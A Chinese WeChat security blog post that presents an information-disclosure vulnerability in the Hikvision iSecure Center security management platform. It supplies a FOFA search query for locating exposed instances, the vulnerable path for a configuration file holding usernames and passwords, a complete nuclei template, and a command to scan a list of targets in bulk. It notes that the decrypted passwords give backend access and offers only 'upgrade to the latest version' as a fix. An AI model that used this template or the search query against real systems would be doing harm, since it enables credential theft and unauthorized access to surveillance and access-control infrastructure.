原创 fgz AI与网安
AI与网安
微信号 gh_c57275954216
功能介绍 漏洞复现 0day/nday分享 poc/exp分享 渗透工具分享 AI算法在网络安全中的应用
__发表于
收录于合集
免责申明: 本 文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
**
**
01
—
漏洞名称
海康威视综合安防管理平台信息泄露(内网集权账户密码)漏洞
02
—
漏洞影响
HIKVISION iSecure Center综合安防管理平台,版本不详
03
—
漏洞描述
HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,海康威视综合安防管理平台信息存在信息泄露(内网集权账户密码)漏洞,可以通过解密软件,解密用户名密码。
04
—
FOFA搜索语句
app="HIKVISION-综合安防管理平台"
05
—
漏洞复现
poc如下
/portal/conf/config.properties
使用浏览器访问
证明存在漏洞
06
—
nuclei poc
poc文件内容如下
id: hikvision-disclosure
info: name: 海康威视综合安防管理平台信息泄露漏洞 author: fgz severity: high reference: - none description: | HIKVISION iSecure Center综合安防管理平台是一套“集成化”、“智能化”的平台,通过接入视频监控、一卡通、停车场、报警检测等系统的设备,获取边缘节点数据,实现安防信息化集成与联动,以电子地图为载体,融合各系统能力实现丰富的智能应用。HIKVISION iSecure Center平台基于“统一软件技术架构”先进理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、统一配置、统一管理和统一调度。存在信息泄露漏洞,密码解密后可以登录后台。 metadata: fofa-query: app="HIKVISION-综合安防管理平台" veified: true tags: hikvision
http: - method: GET path: - "{{BaseURL}}/portal/conf/config.properties"
matchers-condition: and matchers: - type: status status: - 200
- type: word part: body words: - '@bic' - 'username' - 'password' condition: and
运行POC
.\nuclei.exe -t .\hikvision-disclosure.yaml -l .\1.txt -me result
07
—
修复建议
升级到最新版本。
预览时标签不可点
微信扫一扫
关注该公众号
知道了
微信扫一扫
使用小程序
取消 允许
取消 允许
: , 。 视频 小程序 赞 ,轻点两下取消赞 在看 ,轻点两下取消在看